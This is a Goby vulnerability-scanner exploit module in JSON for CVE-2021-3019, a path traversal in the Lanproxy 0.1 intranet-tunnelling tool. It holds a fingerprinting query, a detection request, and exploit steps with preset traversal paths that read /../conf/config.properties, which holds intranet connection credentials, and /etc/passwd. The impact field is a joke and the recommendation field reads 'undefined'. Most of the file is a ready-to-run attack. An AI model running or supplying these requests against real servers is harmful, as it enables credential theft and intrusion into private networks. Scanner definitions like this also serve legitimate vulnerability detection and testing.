{ "Name": "Lanproxy_Arbitrary_File_Read_CVE-2021-3019", "Level": "2", "Tags": [ "目录遍历" ], "GobyQuery": "header=\"Server: LPS-0.1\"", "Description": "Lanproxy是一个将局域网个人电脑、服务器代理到公网的内网穿透工具，支持tcp流量转发，可支持任何tcp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面等等）本次Lanproxy 路径遍历漏洞 (CVE-2021-3019)通过../绕过读取任意文件。该漏洞允许目录遍历读取/../conf/config.properties来获取到内部网连接的凭据。", "Product": "Lanproxy 0.1", "Homepage": "https://github.com/ffay/lanproxy", "Author": "PeiQi", "Impact": "

咩咩咩🐑

", "Recommandation": "

undefined

", "References": [ "http://wiki.peiqi.tech" ], "HasExp": true, "ExpParams": [ { "name": "Filename", "type": "input", "value": "/../conf/config.properties", "show": "" }, { "name": "/etc/passwd", "type": "textarea", "value": "/../../../../../../../../../../etc/passwd", "show": "" } ], "ScanSteps": [ "AND", { "Request": { "method": "GET", "uri": "/../conf/config.properties", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "ResponseTest": { "type": "group", "operation": "AND", "checks": [ { "type": "item", "variable": "$code", "operation": "==", "value": "200", "bz": "" }, { "type": "item", "variable": "$body", "operation": "contains", "value": "server.ssl", "bz": "" } ] }, "SetVariable": [] } ], "ExploitSteps": [ "AND", { "Request": { "method": "GET", "uri": "{{{Filename}}}", "follow_redirect": true, "header": {}, "data_type": "text", "data": "" }, "SetVariable": [ "output|lastbody" ] } ], "PostTime": "2021-01-21 20:51:57", "GobyVersion": "1.8.230" }